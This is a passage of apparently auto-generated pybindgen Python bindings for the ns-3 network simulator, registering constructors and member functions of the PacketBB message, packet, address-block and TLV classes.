cls.add_constructor([param('ns3::PbbAddressBlockIpv6 const &', 'arg0')])
## packetbb.h (module 'network'): ns3::PbbAddressBlockIpv6::PbbAddressBlockIpv6() [constructor]
cls.add_constructor([])
## packetbb.h (module 'network'): ns3::Address ns3::PbbAddressBlockIpv6::DeserializeAddress(uint8_t * buffer) const [member function]
cls.add_method('DeserializeAddress',
'ns3::Address',
[param('uint8_t *', 'buffer')],
is_const=True, visibility='protected', is_virtual=True)
## packetbb.h (module 'network'): uint8_t ns3::PbbAddressBlockIpv6::GetAddressLength() const [member function]
cls.add_method('GetAddressLength',
'uint8_t',
[],
is_const=True, visibility='protected', is_virtual=True)
## packetbb.h (module 'network'): void ns3::PbbAddressBlockIpv6::PrintAddress(std::ostream & os, std::_List_const_iterator<ns3::Address> iter) const [member function]
cls.add_method('PrintAddress',
'void',
[param('std::ostream &', 'os'), param('std::_List_const_iterator< ns3::Address >', 'iter')],
is_const=True, visibility='protected', is_virtual=True)
## packetbb.h (module 'network'): void ns3::PbbAddressBlockIpv6::SerializeAddress(uint8_t * buffer, std::_List_const_iterator<ns3::Address> iter) const [member function]
cls.add_method('SerializeAddress',
'void',
[param('uint8_t *', 'buffer'), param('std::_List_const_iterator< ns3::Address >', 'iter')],
is_const=True, visibility='protected', is_virtual=True)
return
def register_Ns3PbbMessage_methods(root_module, cls):
cls.add_binary_comparison_operator('==')
cls.add_binary_comparison_operator('!=')
## packetbb.h (module 'network'): ns3::PbbMessage::PbbMessage(ns3::PbbMessage const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PbbMessage const &', 'arg0')])
## packetbb.h (module 'network'): ns3::PbbMessage::PbbMessage() [constructor]
cls.add_constructor([])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbAddressBlock> ns3::PbbMessage::AddressBlockBack() [member function]
cls.add_method('AddressBlockBack',
'ns3::Ptr< ns3::PbbAddressBlock >',
[])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbAddressBlock> const ns3::PbbMessage::AddressBlockBack() const [member function]
cls.add_method('AddressBlockBack',
'ns3::Ptr< ns3::PbbAddressBlock > const',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbAddressBlock> > ns3::PbbMessage::AddressBlockBegin() [member function]
cls.add_method('AddressBlockBegin',
'std::_List_iterator< ns3::Ptr< ns3::PbbAddressBlock > >',
[])
## packetbb.h (module 'network'): std::_List_const_iterator<ns3::Ptr<ns3::PbbAddressBlock> > ns3::PbbMessage::AddressBlockBegin() const [member function]
cls.add_method('AddressBlockBegin',
'std::_List_const_iterator< ns3::Ptr< ns3::PbbAddressBlock > >',
[],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbMessage::AddressBlockClear() [member function]
cls.add_method('AddressBlockClear',
'void',
[])
## packetbb.h (module 'network'): bool ns3::PbbMessage::AddressBlockEmpty() const [member function]
cls.add_method('AddressBlockEmpty',
'bool',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbAddressBlock> > ns3::PbbMessage::AddressBlockEnd() [member function]
cls.add_method('AddressBlockEnd',
'std::_List_iterator< ns3::Ptr< ns3::PbbAddressBlock > >',
[])
## packetbb.h (module 'network'): std::_List_const_iterator<ns3::Ptr<ns3::PbbAddressBlock> > ns3::PbbMessage::AddressBlockEnd() const [member function]
cls.add_method('AddressBlockEnd',
'std::_List_const_iterator< ns3::Ptr< ns3::PbbAddressBlock > >',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbAddressBlock> > ns3::PbbMessage::AddressBlockErase(std::_List_iterator<ns3::Ptr<ns3::PbbAddressBlock> > position) [member function]
cls.add_method('AddressBlockErase',
'std::_List_iterator< ns3::Ptr< ns3::PbbAddressBlock > >',
[param('std::_List_iterator< ns3::Ptr< ns3::PbbAddressBlock > >', 'position')])
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbAddressBlock> > ns3::PbbMessage::AddressBlockErase(std::_List_iterator<ns3::Ptr<ns3::PbbAddressBlock> > first, std::_List_iterator<ns3::Ptr<ns3::PbbAddressBlock> > last) [member function]
cls.add_method('AddressBlockErase',
'std::_List_iterator< ns3::Ptr< ns3::PbbAddressBlock > >',
[param('std::_List_iterator< ns3::Ptr< ns3::PbbAddressBlock > >', 'first'), param('std::_List_iterator< ns3::Ptr< ns3::PbbAddressBlock > >', 'last')])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbAddressBlock> ns3::PbbMessage::AddressBlockFront() [member function]
cls.add_method('AddressBlockFront',
'ns3::Ptr< ns3::PbbAddressBlock >',
[])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbAddressBlock> const ns3::PbbMessage::AddressBlockFront() const [member function]
cls.add_method('AddressBlockFront',
'ns3::Ptr< ns3::PbbAddressBlock > const',
[],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbMessage::AddressBlockPopBack() [member function]
cls.add_method('AddressBlockPopBack',
'void',
[])
## packetbb.h (module 'network'): void ns3::PbbMessage::AddressBlockPopFront() [member function]
cls.add_method('AddressBlockPopFront',
'void',
[])
## packetbb.h (module 'network'): void ns3::PbbMessage::AddressBlockPushBack(ns3::Ptr<ns3::PbbAddressBlock> block) [member function]
cls.add_method('AddressBlockPushBack',
'void',
[param('ns3::Ptr< ns3::PbbAddressBlock >', 'block')])
## packetbb.h (module 'network'): void ns3::PbbMessage::AddressBlockPushFront(ns3::Ptr<ns3::PbbAddressBlock> block) [member function]
cls.add_method('AddressBlockPushFront',
'void',
[param('ns3::Ptr< ns3::PbbAddressBlock >', 'block')])
## packetbb.h (module 'network'): int ns3::PbbMessage::AddressBlockSize() const [member function]
cls.add_method('AddressBlockSize',
'int',
[],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbMessage::Deserialize(ns3::Buffer::Iterator & start) [member function]
cls.add_method('Deserialize',
'void',
[param('ns3::Buffer::Iterator &', 'start')])
## packetbb.h (module 'network'): static ns3::Ptr<ns3::PbbMessage> ns3::PbbMessage::DeserializeMessage(ns3::Buffer::Iterator & start) [member function]
cls.add_method('DeserializeMessage',
'ns3::Ptr< ns3::PbbMessage >',
[param('ns3::Buffer::Iterator &', 'start')],
is_static=True)
## packetbb.h (module 'network'): uint8_t ns3::PbbMessage::GetHopCount() const [member function]
cls.add_method('GetHopCount',
'uint8_t',
[],
is_const=True)
## packetbb.h (module 'network'): uint8_t ns3::PbbMessage::GetHopLimit() const [member function]
cls.add_method('GetHopLimit',
'uint8_t',
[],
is_const=True)
## packetbb.h (module 'network'): ns3::Address ns3::PbbMessage::GetOriginatorAddress() const [member function]
cls.add_method('GetOriginatorAddress',
'ns3::Address',
[],
is_const=True)
## packetbb.h (module 'network'): uint16_t ns3::PbbMessage::GetSequenceNumber() const [member function]
cls.add_method('GetSequenceNumber',
'uint16_t',
[],
is_const=True)
## packetbb.h (module 'network'): uint32_t ns3::PbbMessage::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True)
## packetbb.h (module 'network'): uint8_t ns3::PbbMessage::GetType() const [member function]
cls.add_method('GetType',
'uint8_t',
[],
is_const=True)
## packetbb.h (module 'network'): bool ns3::PbbMessage::HasHopCount() const [member function]
cls.add_method('HasHopCount',
'bool',
[],
is_const=True)
## packetbb.h (module 'network'): bool ns3::PbbMessage::HasHopLimit() const [member function]
cls.add_method('HasHopLimit',
'bool',
[],
is_const=True)
## packetbb.h (module 'network'): bool ns3::PbbMessage::HasOriginatorAddress() const [member function]
cls.add_method('HasOriginatorAddress',
'bool',
[],
is_const=True)
## packetbb.h (module 'network'): bool ns3::PbbMessage::HasSequenceNumber() const [member function]
cls.add_method('HasSequenceNumber',
'bool',
[],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbMessage::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbMessage::Print(std::ostream & os, int level) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os'), param('int', 'level')],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbMessage::Serialize(ns3::Buffer::Iterator & start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator &', 'start')],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbMessage::SetHopCount(uint8_t hopcount) [member function]
cls.add_method('SetHopCount',
'void',
[param('uint8_t', 'hopcount')])
## packetbb.h (module 'network'): void ns3::PbbMessage::SetHopLimit(uint8_t hoplimit) [member function]
cls.add_method('SetHopLimit',
'void',
[param('uint8_t', 'hoplimit')])
## packetbb.h (module 'network'): void ns3::PbbMessage::SetOriginatorAddress(ns3::Address address) [member function]
cls.add_method('SetOriginatorAddress',
'void',
[param('ns3::Address', 'address')])
## packetbb.h (module 'network'): void ns3::PbbMessage::SetSequenceNumber(uint16_t seqnum) [member function]
cls.add_method('SetSequenceNumber',
'void',
[param('uint16_t', 'seqnum')])
## packetbb.h (module 'network'): void ns3::PbbMessage::SetType(uint8_t type) [member function]
cls.add_method('SetType',
'void',
[param('uint8_t', 'type')])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbTlv> ns3::PbbMessage::TlvBack() [member function]
cls.add_method('TlvBack',
'ns3::Ptr< ns3::PbbTlv >',
[])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbTlv> const ns3::PbbMessage::TlvBack() const [member function]
cls.add_method('TlvBack',
'ns3::Ptr< ns3::PbbTlv > const',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > ns3::PbbMessage::TlvBegin() [member function]
cls.add_method('TlvBegin',
'std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >',
[])
## packetbb.h (module 'network'): std::_List_const_iterator<ns3::Ptr<ns3::PbbTlv> > ns3::PbbMessage::TlvBegin() const [member function]
cls.add_method('TlvBegin',
'std::_List_const_iterator< ns3::Ptr< ns3::PbbTlv > >',
[],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbMessage::TlvClear() [member function]
cls.add_method('TlvClear',
'void',
[])
## packetbb.h (module 'network'): bool ns3::PbbMessage::TlvEmpty() const [member function]
cls.add_method('TlvEmpty',
'bool',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > ns3::PbbMessage::TlvEnd() [member function]
cls.add_method('TlvEnd',
'std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >',
[])
## packetbb.h (module 'network'): std::_List_const_iterator<ns3::Ptr<ns3::PbbTlv> > ns3::PbbMessage::TlvEnd() const [member function]
cls.add_method('TlvEnd',
'std::_List_const_iterator< ns3::Ptr< ns3::PbbTlv > >',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > ns3::PbbMessage::TlvErase(std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > position) [member function]
cls.add_method('TlvErase',
'std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >',
[param('std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >', 'position')])
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > ns3::PbbMessage::TlvErase(std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > first, std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > last) [member function]
cls.add_method('TlvErase',
'std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >',
[param('std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >', 'first'), param('std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >', 'last')])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbTlv> ns3::PbbMessage::TlvFront() [member function]
cls.add_method('TlvFront',
'ns3::Ptr< ns3::PbbTlv >',
[])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbTlv> const ns3::PbbMessage::TlvFront() const [member function]
cls.add_method('TlvFront',
'ns3::Ptr< ns3::PbbTlv > const',
[],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbMessage::TlvPopBack() [member function]
cls.add_method('TlvPopBack',
'void',
[])
## packetbb.h (module 'network'): void ns3::PbbMessage::TlvPopFront() [member function]
cls.add_method('TlvPopFront',
'void',
[])
## packetbb.h (module 'network'): void ns3::PbbMessage::TlvPushBack(ns3::Ptr<ns3::PbbTlv> tlv) [member function]
cls.add_method('TlvPushBack',
'void',
[param('ns3::Ptr< ns3::PbbTlv >', 'tlv')])
## packetbb.h (module 'network'): void ns3::PbbMessage::TlvPushFront(ns3::Ptr<ns3::PbbTlv> tlv) [member function]
cls.add_method('TlvPushFront',
'void',
[param('ns3::Ptr< ns3::PbbTlv >', 'tlv')])
## packetbb.h (module 'network'): int ns3::PbbMessage::TlvSize() const [member function]
cls.add_method('TlvSize',
'int',
[],
is_const=True)
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbAddressBlock> ns3::PbbMessage::AddressBlockDeserialize(ns3::Buffer::Iterator & start) const [member function]
cls.add_method('AddressBlockDeserialize',
'ns3::Ptr< ns3::PbbAddressBlock >',
[param('ns3::Buffer::Iterator &', 'start')],
is_pure_virtual=True, is_const=True, visibility='protected', is_virtual=True)
## packetbb.h (module 'network'): ns3::Address ns3::PbbMessage::DeserializeOriginatorAddress(ns3::Buffer::Iterator & start) const [member function]
cls.add_method('DeserializeOriginatorAddress',
'ns3::Address',
[param('ns3::Buffer::Iterator &', 'start')],
is_pure_virtual=True, is_const=True, visibility='protected', is_virtual=True)
## packetbb.h (module 'network'): ns3::PbbAddressLength ns3::PbbMessage::GetAddressLength() const [member function]
cls.add_method('GetAddressLength',
'ns3::PbbAddressLength',
[],
is_pure_virtual=True, is_const=True, visibility='protected', is_virtual=True)
## packetbb.h (module 'network'): void ns3::PbbMessage::PrintOriginatorAddress(std::ostream & os) const [member function]
cls.add_method('PrintOriginatorAddress',
'void',
[param('std::ostream &', 'os')],
is_pure_virtual=True, is_const=True, visibility='protected', is_virtual=True)
## packetbb.h (module 'network'): void ns3::PbbMessage::SerializeOriginatorAddress(ns3::Buffer::Iterator & start) const [member function]
cls.add_method('SerializeOriginatorAddress',
'void',
[param('ns3::Buffer::Iterator &', 'start')],
is_pure_virtual=True, is_const=True, visibility='protected', is_virtual=True)
return
def register_Ns3PbbMessageIpv4_methods(root_module, cls):
## packetbb.h (module 'network'): ns3::PbbMessageIpv4::PbbMessageIpv4(ns3::PbbMessageIpv4 const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PbbMessageIpv4 const &', 'arg0')])
## packetbb.h (module 'network'): ns3::PbbMessageIpv4::PbbMessageIpv4() [constructor]
cls.add_constructor([])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbAddressBlock> ns3::PbbMessageIpv4::AddressBlockDeserialize(ns3::Buffer::Iterator & start) const [member function]
cls.add_method('AddressBlockDeserialize',
'ns3::Ptr< ns3::PbbAddressBlock >',
[param('ns3::Buffer::Iterator &', 'start')],
is_const=True, visibility='protected', is_virtual=True)
## packetbb.h (module 'network'): ns3::Address ns3::PbbMessageIpv4::DeserializeOriginatorAddress(ns3::Buffer::Iterator & start) const [member function]
cls.add_method('DeserializeOriginatorAddress',
'ns3::Address',
[param('ns3::Buffer::Iterator &', 'start')],
is_const=True, visibility='protected', is_virtual=True)
## packetbb.h (module 'network'): ns3::PbbAddressLength ns3::PbbMessageIpv4::GetAddressLength() const [member function]
cls.add_method('GetAddressLength',
'ns3::PbbAddressLength',
[],
is_const=True, visibility='protected', is_virtual=True)
## packetbb.h (module 'network'): void ns3::PbbMessageIpv4::PrintOriginatorAddress(std::ostream & os) const [member function]
cls.add_method('PrintOriginatorAddress',
'void',
[param('std::ostream &', 'os')],
is_const=True, visibility='protected', is_virtual=True)
## packetbb.h (module 'network'): void ns3::PbbMessageIpv4::SerializeOriginatorAddress(ns3::Buffer::Iterator & start) const [member function]
cls.add_method('SerializeOriginatorAddress',
'void',
[param('ns3::Buffer::Iterator &', 'start')],
is_const=True, visibility='protected', is_virtual=True)
return
def register_Ns3PbbMessageIpv6_methods(root_module, cls):
## packetbb.h (module 'network'): ns3::PbbMessageIpv6::PbbMessageIpv6(ns3::PbbMessageIpv6 const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PbbMessageIpv6 const &', 'arg0')])
## packetbb.h (module 'network'): ns3::PbbMessageIpv6::PbbMessageIpv6() [constructor]
cls.add_constructor([])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbAddressBlock> ns3::PbbMessageIpv6::AddressBlockDeserialize(ns3::Buffer::Iterator & start) const [member function]
cls.add_method('AddressBlockDeserialize',
'ns3::Ptr< ns3::PbbAddressBlock >',
[param('ns3::Buffer::Iterator &', 'start')],
is_const=True, visibility='protected', is_virtual=True)
## packetbb.h (module 'network'): ns3::Address ns3::PbbMessageIpv6::DeserializeOriginatorAddress(ns3::Buffer::Iterator & start) const [member function]
cls.add_method('DeserializeOriginatorAddress',
'ns3::Address',
[param('ns3::Buffer::Iterator &', 'start')],
is_const=True, visibility='protected', is_virtual=True)
## packetbb.h (module 'network'): ns3::PbbAddressLength ns3::PbbMessageIpv6::GetAddressLength() const [member function]
cls.add_method('GetAddressLength',
'ns3::PbbAddressLength',
[],
is_const=True, visibility='protected', is_virtual=True)
## packetbb.h (module 'network'): void ns3::PbbMessageIpv6::PrintOriginatorAddress(std::ostream & os) const [member function]
cls.add_method('PrintOriginatorAddress',
'void',
[param('std::ostream &', 'os')],
is_const=True, visibility='protected', is_virtual=True)
## packetbb.h (module 'network'): void ns3::PbbMessageIpv6::SerializeOriginatorAddress(ns3::Buffer::Iterator & start) const [member function]
cls.add_method('SerializeOriginatorAddress',
'void',
[param('ns3::Buffer::Iterator &', 'start')],
is_const=True, visibility='protected', is_virtual=True)
return
def register_Ns3PbbPacket_methods(root_module, cls):
cls.add_binary_comparison_operator('==')
cls.add_binary_comparison_operator('!=')
## packetbb.h (module 'network'): ns3::PbbPacket::PbbPacket(ns3::PbbPacket const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PbbPacket const &', 'arg0')])
## packetbb.h (module 'network'): ns3::PbbPacket::PbbPacket() [constructor]
cls.add_constructor([])
## packetbb.h (module 'network'): uint32_t ns3::PbbPacket::Deserialize(ns3::Buffer::Iterator start) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'start')],
is_virtual=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > ns3::PbbPacket::Erase(std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > position) [member function]
cls.add_method('Erase',
'std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >',
[param('std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >', 'position')])
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > ns3::PbbPacket::Erase(std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > first, std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > last) [member function]
cls.add_method('Erase',
'std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >',
[param('std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >', 'first'), param('std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >', 'last')])
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbMessage> > ns3::PbbPacket::Erase(std::_List_iterator<ns3::Ptr<ns3::PbbMessage> > position) [member function]
cls.add_method('Erase',
'std::_List_iterator< ns3::Ptr< ns3::PbbMessage > >',
[param('std::_List_iterator< ns3::Ptr< ns3::PbbMessage > >', 'position')])
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbMessage> > ns3::PbbPacket::Erase(std::_List_iterator<ns3::Ptr<ns3::PbbMessage> > first, std::_List_iterator<ns3::Ptr<ns3::PbbMessage> > last) [member function]
cls.add_method('Erase',
'std::_List_iterator< ns3::Ptr< ns3::PbbMessage > >',
[param('std::_List_iterator< ns3::Ptr< ns3::PbbMessage > >', 'first'), param('std::_List_iterator< ns3::Ptr< ns3::PbbMessage > >', 'last')])
## packetbb.h (module 'network'): ns3::TypeId ns3::PbbPacket::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## packetbb.h (module 'network'): uint16_t ns3::PbbPacket::GetSequenceNumber() const [member function]
cls.add_method('GetSequenceNumber',
'uint16_t',
[],
is_const=True)
## packetbb.h (module 'network'): uint32_t ns3::PbbPacket::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True, is_virtual=True)
## packetbb.h (module 'network'): static ns3::TypeId ns3::PbbPacket::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## packetbb.h (module 'network'): uint8_t ns3::PbbPacket::GetVersion() const [member function]
cls.add_method('GetVersion',
'uint8_t',
[],
is_const=True)
## packetbb.h (module 'network'): bool ns3::PbbPacket::HasSequenceNumber() const [member function]
cls.add_method('HasSequenceNumber',
'bool',
[],
is_const=True)
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbMessage> ns3::PbbPacket::MessageBack() [member function]
cls.add_method('MessageBack',
'ns3::Ptr< ns3::PbbMessage >',
[])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbMessage> const ns3::PbbPacket::MessageBack() const [member function]
cls.add_method('MessageBack',
'ns3::Ptr< ns3::PbbMessage > const',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbMessage> > ns3::PbbPacket::MessageBegin() [member function]
cls.add_method('MessageBegin',
'std::_List_iterator< ns3::Ptr< ns3::PbbMessage > >',
[])
## packetbb.h (module 'network'): std::_List_const_iterator<ns3::Ptr<ns3::PbbMessage> > ns3::PbbPacket::MessageBegin() const [member function]
cls.add_method('MessageBegin',
'std::_List_const_iterator< ns3::Ptr< ns3::PbbMessage > >',
[],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbPacket::MessageClear() [member function]
cls.add_method('MessageClear',
'void',
[])
## packetbb.h (module 'network'): bool ns3::PbbPacket::MessageEmpty() const [member function]
cls.add_method('MessageEmpty',
'bool',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbMessage> > ns3::PbbPacket::MessageEnd() [member function]
cls.add_method('MessageEnd',
'std::_List_iterator< ns3::Ptr< ns3::PbbMessage > >',
[])
## packetbb.h (module 'network'): std::_List_const_iterator<ns3::Ptr<ns3::PbbMessage> > ns3::PbbPacket::MessageEnd() const [member function]
cls.add_method('MessageEnd',
'std::_List_const_iterator< ns3::Ptr< ns3::PbbMessage > >',
[],
is_const=True)
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbMessage> ns3::PbbPacket::MessageFront() [member function]
cls.add_method('MessageFront',
'ns3::Ptr< ns3::PbbMessage >',
[])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbMessage> const ns3::PbbPacket::MessageFront() const [member function]
cls.add_method('MessageFront',
'ns3::Ptr< ns3::PbbMessage > const',
[],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbPacket::MessagePopBack() [member function]
cls.add_method('MessagePopBack',
'void',
[])
## packetbb.h (module 'network'): void ns3::PbbPacket::MessagePopFront() [member function]
cls.add_method('MessagePopFront',
'void',
[])
## packetbb.h (module 'network'): void ns3::PbbPacket::MessagePushBack(ns3::Ptr<ns3::PbbMessage> message) [member function]
cls.add_method('MessagePushBack',
'void',
[param('ns3::Ptr< ns3::PbbMessage >', 'message')])
## packetbb.h (module 'network'): void ns3::PbbPacket::MessagePushFront(ns3::Ptr<ns3::PbbMessage> message) [member function]
cls.add_method('MessagePushFront',
'void',
[param('ns3::Ptr< ns3::PbbMessage >', 'message')])
## packetbb.h (module 'network'): int ns3::PbbPacket::MessageSize() const [member function]
cls.add_method('MessageSize',
'int',
[],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbPacket::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True, is_virtual=True)
## packetbb.h (module 'network'): void ns3::PbbPacket::Serialize(ns3::Buffer::Iterator start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator', 'start')],
is_const=True, is_virtual=True)
## packetbb.h (module 'network'): void ns3::PbbPacket::SetSequenceNumber(uint16_t number) [member function]
cls.add_method('SetSequenceNumber',
'void',
[param('uint16_t', 'number')])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbTlv> ns3::PbbPacket::TlvBack() [member function]
cls.add_method('TlvBack',
'ns3::Ptr< ns3::PbbTlv >',
[])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbTlv> const ns3::PbbPacket::TlvBack() const [member function]
cls.add_method('TlvBack',
'ns3::Ptr< ns3::PbbTlv > const',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > ns3::PbbPacket::TlvBegin() [member function]
cls.add_method('TlvBegin',
'std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >',
[])
## packetbb.h (module 'network'): std::_List_const_iterator<ns3::Ptr<ns3::PbbTlv> > ns3::PbbPacket::TlvBegin() const [member function]
cls.add_method('TlvBegin',
'std::_List_const_iterator< ns3::Ptr< ns3::PbbTlv > >',
[],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbPacket::TlvClear() [member function]
cls.add_method('TlvClear',
'void',
[])
## packetbb.h (module 'network'): bool ns3::PbbPacket::TlvEmpty() const [member function]
cls.add_method('TlvEmpty',
'bool',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > ns3::PbbPacket::TlvEnd() [member function]
cls.add_method('TlvEnd',
'std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >',
[])
## packetbb.h (module 'network'): std::_List_const_iterator<ns3::Ptr<ns3::PbbTlv> > ns3::PbbPacket::TlvEnd() const [member function]
cls.add_method('TlvEnd',
'std::_List_const_iterator< ns3::Ptr< ns3::PbbTlv > >',
[],
is_const=True)
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbTlv> ns3::PbbPacket::TlvFront() [member function]
cls.add_method('TlvFront',
'ns3::Ptr< ns3::PbbTlv >',
[])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbTlv> const ns3::PbbPacket::TlvFront() const [member function]
cls.add_method('TlvFront',
'ns3::Ptr< ns3::PbbTlv > const',
[],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbPacket::TlvPopBack() [member function]
cls.add_method('TlvPopBack',
'void',
[])
## packetbb.h (module 'network'): void ns3::PbbPacket::TlvPopFront() [member function]
cls.add_method('TlvPopFront',
'void',
[])
## packetbb.h (module 'network'): void ns3::PbbPacket::TlvPushBack(ns3::Ptr<ns3::PbbTlv> tlv) [member function]
cls.add_method('TlvPushBack',
'void',
[param('ns3::Ptr< ns3::PbbTlv >', 'tlv')])
## packetbb.h (module 'network'): void ns3::PbbPacket::TlvPushFront(ns3::Ptr<ns3::PbbTlv> tlv) [member function]
cls.add_method('TlvPushFront',
'void',
[param('ns3::Ptr< ns3::PbbTlv >', 'tlv')])
## packetbb.h (module 'network'): int ns3::PbbPacket::TlvSize() const [member function]
cls.add_method('TlvSize',
'int',
[],
is_const=True)
return
def register_Ns3PbbTlv_methods(root_module, cls):
cls.add_binary_comparison_operator('==')
cls.add_binary_comparison_operator('!=')
## packetbb.h (module 'network'): ns3::PbbTlv::PbbTlv(ns3::PbbTlv const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PbbTlv const &', 'arg0')])
## packetbb.h (module 'network'): ns3::PbbTlv::PbbTlv() [constructor]
cls.add_constructor([])
## packetbb.h (module 'network'): void ns3::PbbTlv::Deserialize(ns3::Buffer::Iterator & start) [member function]
cls.add_method('Deserialize',
'void',
[param('ns3::Buffer::Iterator &', 'start')])
## packetbb.h (module 'network'): uint32_t ns3::PbbTlv::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True)
## packetbb.h (module 'network'): uint8_t ns3::PbbTlv::GetType() const [member function]
cls.add_method('GetType',
'uint8_t',
[],
is_const=True)
## packetbb.h (module 'network'): uint8_t ns3::PbbTlv::GetTypeExt() const [member function]
cls.add_method('GetTypeExt',
'uint8_t',
[],
is_const=True)
## packetbb.h (module 'network'): ns3::Buffer ns3::PbbTlv::GetValue() const [member function]
cls.add_method('GetValue',
'ns3::Buffer',
[],
is_const=True)
## packetbb.h (module 'network'): bool ns3::PbbTlv::HasTypeExt() const [member function]
cls.add_method('HasTypeExt',
'bool',
[],
is_const=True)
## packetbb.h (module 'network'): bool ns3::PbbTlv::HasValue() const [member function]
cls.add_method('HasValue',
'bool',
[],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbTlv::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbTlv::Print(std::ostream & os, int level) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os'), param('int', 'level')],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbTlv::Serialize(ns3::Buffer::Iterator & start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator &', 'start')],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbTlv::SetType(uint8_t type) [member function]
cls.add_method('SetType',
'void',
[param('uint8_t', 'type')])
